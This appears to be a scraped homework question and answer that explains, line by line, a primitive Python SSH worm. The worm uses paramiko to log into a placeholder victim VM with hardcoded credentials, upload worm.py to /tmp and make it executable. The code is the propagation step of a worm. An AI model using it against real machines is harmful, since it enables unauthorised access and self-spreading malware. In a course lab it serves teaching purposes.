Consider the following code for implementing a primitive SSH worm in Python. Explain what each line does:
import paramiko
ssh = paramiko . SSHClient ()
ssh . set missing host key policy (paramiko . AutoAddPolicy ())
ssh . connect(”<IP OF THE VICTIM VM>”, username=”cpsc ” , password=”cpsc ”)
sftpClient = ssh . open sftp ()
sftpClient . put(”worm.py” , ”/tmp/” + ”worm.py”)
ssh . exec command(”chmod a+x /tmp/worm. py”)
import paramiko
ssh = paramiko.SSHClient() #Create a new SSHClient instance
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) #Set policy to use when connecting to servers without a known host key. Policy for automatically adding the hostname and new host key to the local HostKeys object, and saving it. This is used by SSHClient.
ssh.connect("<IP OF THE VICTIM VM>", username="cpsc" , password="cpsc") # Establish a ssh connection to the host with ip address as <IP OF THE VICTIM VM>, username as cpsc and password as cpsc. This is similar to execting command "ssh cpsc@<IP OF THE VICTIM VM>" and then entering the password "cpsc".
sftpClient = ssh.open_sftp() #Open an SFTP(Secure File Transfer Protocol) session on the SSH server and returns a new SFTPClient session object
sftpClient.put("worm.py" , "/tmp/"+"worm.py") # Copy worm.py to the SFTP server at path "/tmp/worm.py"
ssh.exec_command("chmod a+x /tmp/worm.py") # Changing the read write execute permission of worm.py to execute permission to all users by exeuting the shell command chmod
Explanation:
SSH is typically used to log into a remote machine and execute commands. To connect to a remote host we use "ssh username@ip" and then password to connect. paramiko is a package that provides python ssh interfacing utilities to connect to a remote client. This program connects and transfers worm.py to the remote server to path tmp/worm.py and change its read write permission to execute permission by all users of the remote system using chmod linux utility.
Consider the following code for implementing a primitive SSH worm in Python. Explain what each line...